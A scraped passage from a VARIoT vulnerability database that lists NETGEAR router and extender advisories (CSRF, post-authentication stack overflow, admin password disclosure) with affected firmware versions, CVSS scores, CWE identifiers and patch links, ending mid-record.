"data": "Certain NETGEAR devices are affected by CSRF. This affects R6300v2 before 1.0.4.8, R6400v2 before 1.0.2.32, R6700 before 1.0.1.22, R6900 before 1.0.1.22, R7000P before 1.0.0.86, R6900P before 1.0.0.56, R7300 before 1.0.0.54, R8300 before 1.0.2.106, R8500 before 1.0.2.106, DGN2200v4 before 1.0.0.86, DGND2200Bv4 before 1.0.0.86, R6050 before 1.0.0.86, JR6150 before 1.0.1.10, R6220 before 1.1.0.50, and WNDR3700v5 before V1.1.0.48. plural NETGEAR A cross-site request forgery vulnerability exists in the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR R6700, etc. are all wireless routers from NETGEAR. Attackers can use this vulnerability to read arbitrary files",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-18755"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014922"
},
{
"db": "CNVD",
"id": "CNVD-2021-57165"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-18755",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014922",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-57165",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1928",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-57165"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014922"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1928"
},
{
"db": "NVD",
"id": "CVE-2017-18755"
}
]
},
"id": "VAR-202004-1358",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-57165"
}
],
"trust": 1.0257907004761906
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-57165"
}
]
},
"last_update_date": "2024-11-23T22:05:40.304000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Cross Site Request Forgery on Routers and Modem Routers, PSV-2017-0333",
"trust": 0.8,
"url": "https://kb.netgear.com/000051493/Security-Advisory-for-Cross-Site-Request-Forgery-on-Routers-and-Modem-Routers-PSV-2017-0333"
},
{
"title": "Patch for Cross-site request forgery vulnerability in multiple NETGEAR products (CNVD-2021-57165)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/282696"
},
{
"title": "Multiple NETGEAR Repair measures for product cross-site request forgery vulnerability",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=117254"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-57165"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014922"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1928"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014922"
},
{
"db": "NVD",
"id": "CVE-2017-18755"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18755"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000051493/security-advisory-for-cross-site-request-forgery-on-routers-and-modem-routers-psv-2017-0333"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-18755"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-57165"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014922"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1928"
},
{
"db": "NVD",
"id": "CVE-2017-18755"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-57165"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014922"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1928"
},
{
"db": "NVD",
"id": "CVE-2017-18755"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-07-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-57165"
},
{
"date": "2020-05-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014922"
},
{
"date": "2020-04-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1928"
},
{
"date": "2020-04-22T17:15:11.777000",
"db": "NVD",
"id": "CVE-2017-18755"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-31T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-57165"
},
{
"date": "2020-05-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014922"
},
{
"date": "2020-04-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1928"
},
{
"date": "2024-11-21T03:20:50.513000",
"db": "NVD",
"id": "CVE-2017-18755"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1928"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Cross-site request forgery vulnerability in device",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014922"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1928"
}
],
"trust": 0.6
}
}
var-202004-1650
Vulnerability from variot
Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects DGN2200Bv4 before 1.0.0.102, DGN2200v4 before 1.0.0.102, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150 before 1.0.0.38, EX6200 before 1.0.3.86, EX7000 before 1.0.0.64, R6300v2 before 1.0.4.22, R6900P before 1.3.0.18, R7000P before 1.3.0.18, R7300DST before 1.0.0.62, R7900P before 1.3.0.10, R8000 before 1.0.4.12, R8000P before 1.3.0.10, WN2500RPv2 before 1.0.1.52, and WNDR3400v3 before 1.0.1.18. plural NETGEAR The device is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR EX7000 etc. are all products of NETGEAR company. NETGEAR EX7000 is a wireless network signal extender. NETGEAR DGN2200 is a wireless router. NETGEAR EX3700 is a wireless network signal extender. The vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not correctly verified, resulting in incorrect read and write operations to other associated memory locations. Attackers can use this vulnerability to cause buffer overflow or heap overflow
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1650",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ex3700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex3800",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex6000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.30"
},
{
"model": "ex6100",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.22"
},
{
"model": "ex6120",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "ex6130",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.22"
},
{
"model": "ex6150",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.38"
},
{
"model": "ex6200",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.86"
},
{
"model": "ex7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.18"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.18"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.62"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.10"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.10"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "dgn2200b",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "wn2500rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.52"
},
{
"model": "dgn2200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.22"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "dgn2200b",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "ex3700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex3800",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex6000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.30"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.22"
},
{
"model": "ex6120",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "ex6130",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.22"
},
{
"model": "ex6150",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.38"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.86"
},
{
"model": "dgn2200bv4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "dgn2200v4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.22"
},
{
"model": "wn2500rpv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.52"
},
{
"model": "wndr3400v3",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.18"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50929"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016417"
},
{
"db": "NVD",
"id": "CVE-2018-21163"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:dgn2200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgn2200b_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex3700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex3800_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6100_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6120_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6130_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6150_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6200_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016417"
}
]
},
"cve": "CVE-2018-21163",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2018-21163",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2018-016417",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CNVD-2021-50929",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"id": "CVE-2018-21163",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.9,
"id": "CVE-2018-21163",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.2,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2018-016417",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-21163",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "cve@mitre.org",
"id": "CVE-2018-21163",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2018-016417",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2021-50929",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-2036",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50929"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016417"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2036"
},
{
"db": "NVD",
"id": "CVE-2018-21163"
},
{
"db": "NVD",
"id": "CVE-2018-21163"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects DGN2200Bv4 before 1.0.0.102, DGN2200v4 before 1.0.0.102, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150 before 1.0.0.38, EX6200 before 1.0.3.86, EX7000 before 1.0.0.64, R6300v2 before 1.0.4.22, R6900P before 1.3.0.18, R7000P before 1.3.0.18, R7300DST before 1.0.0.62, R7900P before 1.3.0.10, R8000 before 1.0.4.12, R8000P before 1.3.0.10, WN2500RPv2 before 1.0.1.52, and WNDR3400v3 before 1.0.1.18. plural NETGEAR The device is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR EX7000 etc. are all products of NETGEAR company. NETGEAR EX7000 is a wireless network signal extender. NETGEAR DGN2200 is a wireless router. NETGEAR EX3700 is a wireless network signal extender. The vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not correctly verified, resulting in incorrect read and write operations to other associated memory locations. Attackers can use this vulnerability to cause buffer overflow or heap overflow",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-21163"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016417"
},
{
"db": "CNVD",
"id": "CNVD-2021-50929"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-21163",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016417",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-50929",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2036",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50929"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016417"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2036"
},
{
"db": "NVD",
"id": "CVE-2018-21163"
}
]
},
"id": "VAR-202004-1650",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50929"
}
],
"trust": 1.0827118864999998
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50929"
}
]
},
"last_update_date": "2024-11-23T22:05:39.992000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Post-Authentication Stack Overflow on Some Routers, Gateways, and Extenders, PSV-2017-0308",
"trust": 0.8,
"url": "https://kb.netgear.com/000055196/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-0308"
},
{
"title": "Patch for Buffer overflow vulnerabilities in multiple NETGEAR products (CNVD-2021-50929)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/279131"
},
{
"title": "Multiple NETGEAR Product Buffer Error Vulnerability Fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=116791"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50929"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016417"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2036"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016417"
},
{
"db": "NVD",
"id": "CVE-2018-21163"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-21163"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000055196/security-advisory-for-post-authentication-stack-overflow-on-some-routers-gateways-and-extenders-psv-2017-0308"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-21163"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-50929"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016417"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2036"
},
{
"db": "NVD",
"id": "CVE-2018-21163"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-50929"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016417"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2036"
},
{
"db": "NVD",
"id": "CVE-2018-21163"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-07-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-50929"
},
{
"date": "2020-06-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-016417"
},
{
"date": "2020-04-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2036"
},
{
"date": "2020-04-23T21:15:11.940000",
"db": "NVD",
"id": "CVE-2018-21163"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-50929"
},
{
"date": "2020-06-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-016417"
},
{
"date": "2020-05-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2036"
},
{
"date": "2024-11-21T04:03:03.427000",
"db": "NVD",
"id": "CVE-2018-21163"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2036"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Out-of-bounds write vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016417"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2036"
}
],
"trust": 0.6
}
}
var-202004-1341
Vulnerability from variot
Certain NETGEAR devices are affected by administrative password disclosure. This affects D6220 before V1.0.0.28, D6400 before V1.0.0.60, D8500 before V1.0.3.29, DGN2200v4 before 1.0.0.82, DGN2200Bv4 before 1.0.0.82, R6300v2 before 1.0.4.8, R6400 before 1.0.1.20, R6700 before 1.0.1.20, R6900 before 1.0.1.20, R7000 before 1.0.7.10, R7100LG before V1.0.0.32, R7300DST before 1.0.0.52, R7900 before 1.0.1.16, R8000 before 1.0.3.36, R8300 before 1.0.2.94, R8500 before 1.0.2.94, WNDR3400v3 before 1.0.1.12, and WNR3500Lv2 before 1.2.0.40. plural NETGEAR Devices contain vulnerabilities in insufficient protection of credentials.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR WNR3500L, etc. are all products of NETGEAR. WNR3500L is a wireless router. NETGEAR R6700 is a wireless router. NETGEAR D6220 is a wireless modem
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
